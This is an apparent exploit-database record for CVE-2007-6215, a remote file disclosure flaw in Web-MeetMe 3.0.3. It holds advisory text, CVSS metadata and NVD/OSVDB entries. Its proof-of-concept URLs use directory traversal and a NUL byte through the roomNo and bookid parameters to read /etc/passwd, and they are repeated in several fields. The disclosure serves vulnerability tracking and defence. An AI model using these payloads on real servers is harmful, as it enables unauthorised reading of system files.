ID EDB-ID:4676
Type exploitdb
Reporter Evil.Man
Modified 2007-11-29T00:00:00
Description
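Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability. CVE-2007-6215. Webapps exploit for php platform. The flaw is a directory traversal: play.php accepts .. (dot dot) sequences in the roomNo parameter, and possibly in bookid, so a remote request with no authentication can read arbitrary files (CVSS 5.0, confidentiality impact only). No fix is referenced on this page; a deployment would need to validate both parameters (for example, reject path separators, dot-dot sequences and NUL bytes) before they reach any file path.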
/--------------------------------------------------------------------------\
|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability |
|Download Script : |
| http://sourceforge.net/project/showfiles.php?group_id=164788 |
|POC : |
| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00 |
| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00 |
|Discovered by : Evil.Man |
|Home Page : Tryag.Com/cc |
|Email : Evil.Man@windowslive.com |
|Sp.Thanx To : GoLd_M [Mahmood_ali"Tryag.Com"] & Sniper-Sa.Com |
\--------------------------------------------------------------------------/
# milw0rm.com [2007-11-29]
{"id": "EDB-ID:4676", "hash": "d42196048e9686b2439ce492f695248d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Web-MeetMe 3.0.3 play.php Remote File Disclosure Vulnerability", "description": "Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability. CVE-2007-6215. Webapps exploit for php platform", "published": "2007-11-29T00:00:00", "modified": "2007-11-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/4676/", "reporter": "Evil.Man", "references": [], "cvelist": ["CVE-2007-6215"], "lastseen": "2016-01-31T21:30:11", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2016-01-31T21:30:11"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6215"]}, {"type": "osvdb", "idList": ["OSVDB:39697"]}], "modified": "2016-01-31T21:30:11"}, "vulnersScore": 5.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4676/", "sourceData": "/--------------------------------------------------------------------------\\\n|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability |\n|Download Script : |\n| http://sourceforge.net/project/showfiles.php?group_id=164788 |\n|POC : |\n| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00 |\n| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00 |\n|Discovered by : Evil.Man |\n|Home Page : Tryag.Com/cc |\n|Email : Evil.Man@windowslive.com |\n|Sp.Thanx To : GoLd_M [Mahmood_ali\"Tryag.Com\"] & Sniper-Sa.Com |\n\\--------------------------------------------------------------------------/\n\n# milw0rm.com [2007-11-29]\n", "osvdbidlist": ["39697"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:02", "bulletinFamily": "NVD", "description": "Multiple directory traversal vulnerabilities in play.php in Web-MeetMe 3.0.3 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) roomNo and possibly the (2) bookid parameter.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-6215", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6215", "published": "2007-12-04T15:46:00", "title": "CVE-2007-6215", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "## Manual Testing Notes\n/play.php?roomNo=../../../../../../../../etc/passwd%00\n/play.php?bookid=../../../../../../../../etc/passwd%00\n## References:\nVendor URL: http://sourceforge.net/projects/web-meetme\nISS X-Force ID: 38772\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4676\n[CVE-2007-6215](https://vulners.com/cve/CVE-2007-6215)\nBugtraq ID: 26641\n", "modified": "2007-11-29T00:00:00", "published": "2007-11-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39697", "id": "OSVDB:39697", "title": "Web-MeetMe play.php Multiple Variable Traversal Arbitrary File Access", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}